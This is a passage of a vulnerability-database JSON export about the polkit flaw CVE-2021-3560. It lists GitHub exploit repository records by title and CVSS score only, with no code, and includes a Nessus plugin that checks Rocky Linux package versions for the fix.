"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-05-25T00:38:28", "id": "8864D179-08CB-51B7-8B06-0D64118BD6B9", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-06-19T16:45:23", "description": "# CVE-2021-3560\nPolkit Instant Root Exploit\n\nYou can run one com...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-02T17:08:24", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-03-24T03:48:31", "id": "A36243CA-7BAA-5CA7-82CB-A7C4B24456B6", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-06-19T16:06:24", "description": "# XDR-LabSetup.sh\n\n*Description*\n\nThis program is used in conjun...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-23T18:57:21", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-11-25T18:08:37", "id": "D3DACBE8-D7F0-53E7-BBA2-40B044FDB5CE", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:08:06", "description": "# CVE-2021-3560\n\n## Polkit - Local Privilege Escalation\n\nOrigina...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T07:37:15", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-26T07:06:22", "id": "8355CDEF-4353-5AEE-915E-3AF0E2AF9409", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:39", "description": "# CVE-2021-3560\n\n## Polkit - Local Privilege Escalation\n\nOrigina...", "cvss3": {}, "published": "2021-07-26T07:08:36", "type": "githubexploit", "title": "Exploit for CVE-2021-3560", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-11-12T10:15:46", "id": "FC96322B-C3D8-5037-9C04-217A27794418", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-03-15T04:32:09", "description": "# Polkit-CVE-2021-3560\n\n\n## Background\n\nIn early 2021 a research...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-29T20:47:16", "type": "githubexploit", "title": "Exploit for Incorrect Authorization in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-03-15T01:43:44", "id": "72D36AF5-1D4B-53BF-8A5F-28BFD556A52E", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-16T21:17:27", "description": "# Exploit for CVE-2021-3560 (Polkit) - Local Privilege Escalatio...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-02T23:56:31", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-09-16T18:47:00", "id": "A7D8D274-4FE7-5BFB-B3A3-7EDB427ED94E", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:09:39", "description": "# A NYCU CVE-2021-3560 research. QQ\nA CVE-2021-3560 poc, easy to...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-28T06:05:46", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-29T08:24:46", "id": "6E1579B5-B91F-5348-A0B2-8218964434CA", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:13:22", "description": "# polkit-auto-exploit\nAutomatic Explotation PoC for Polkit CVE-2...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T12:33:56", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-01-26T02:05:53", "id": "B9510646-2BAA-56FD-ABAC-FEAE65C9F78D", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-04T20:32:58", "description": "<h1 align=center>Vivald0x6f</h1>\n<p align=center>Vivald0x6f is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-21T21:39:29", "type": "githubexploit", "title": "Exploit for Incorrect Authorization in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-03-04T19:54:45", "id": "090B9267-05A2-54BE-B7F4-C0F49CDE011D", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-28T22:11:25", "description": "# polkadots\n## CVE-2021-3560 Local PrivEsc Exploit\n\n##### This e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T14:28:43", "type": "githubexploit", "title": "Exploit for Incorrect Authorization in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-02-25T07:03:00", "id": "4DC0E03F-8753-543D-A4E9-1244313FCC06", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T12:41:31", "description": "# Polkit-exploit - CVE-2021-3560\nPrivilege escalation with polki...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-19T08:15:17", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-07-15T08:55:02", "id": "E0649464-438C-5420-8A33-0542A884B4BA", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-11T21:08:01", "description": "# CVE-2021-3560\na reliable C based exploit for CVE-2021-3560.\n\n#...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-12T05:22:35", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-06-21T08:14:30", "id": "7A9A11EA-FF06-5AD3-A559-CA9EF02D443F", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-05T20:37:24", "description": "<h1 style=\"font-size:10vw\" align=\"left\">CVE-2021-3560 - Polkit L...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-10T04:26:13", "type": "githubexploit", "title": "Exploit for Improper Check for Unusual or Exceptional Conditions in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2023-07-10T04:29:22", "id": "CFE3102D-90DC-50DB-8D7D-CFED76AAE825", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# CVE-2021-4034\nPoC for PwnKit: Local Privilege Escalation Vulne...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T07:19:17", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Polkit Project Polkit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560", "CVE-2021-4034"], "modified": "2022-02-08T13:51:01", "id": "CACC713E-498A-52BA-B12E-23D4C11929E7", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2023-08-02T15:21:32", "description": "The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RLSA-2021:2238 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-09T00:00:00", "type": "nessus", "title": "Rocky Linux 8 : polkit (RLSA-2021:2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:rocky:linux:polkit", "p-cpe:/a:rocky:linux:polkit-debuginfo", "p-cpe:/a:rocky:linux:polkit-debugsource", "p-cpe:/a:rocky:linux:polkit-devel", "p-cpe:/a:rocky:linux:polkit-docs", "p-cpe:/a:rocky:linux:polkit-libs", "p-cpe:/a:rocky:linux:polkit-libs-debuginfo", "cpe:/o:rocky:linux:8"], "id": "ROCKY_LINUX_RLSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/157732", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Rocky Linux Security Advisory RLSA-2021:2238.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157732);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"RLSA\", value:\"2021:2238\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Rocky Linux 8 : polkit (RLSA-2021:2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Rocky Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Rocky Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nRLSA-2021:2238 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://errata.rockylinux.org/RLSA-2021:2238\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1961710\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:rocky:linux:polkit-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:rocky:linux:8\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Rocky Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RockyLinux/release\", \"Host/RockyLinux/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RockyLinux/release');\nif (isnull(release) || 'Rocky Linux' >!< release) audit(AUDIT_OS_NOT, 'Rocky Linux');\nvar os_ver = pregmatch(pattern: \"Rocky(?: Linux)? release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Rocky Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Rocky Linux 8.x', 'Rocky Linux ' + os_ver);\n\nif (!get_kb_item('Host/RockyLinux/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Rocky Linux', cpu);\n\nvar pkgs = [\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-debuginfo-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-debuginfo-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-debuginfo-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-debugsource-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-debugsource-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-debugsource-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-debuginfo-0.115-11.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-debuginfo-0.115-11.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-debuginfo-0.115-11.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'Rocky-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if 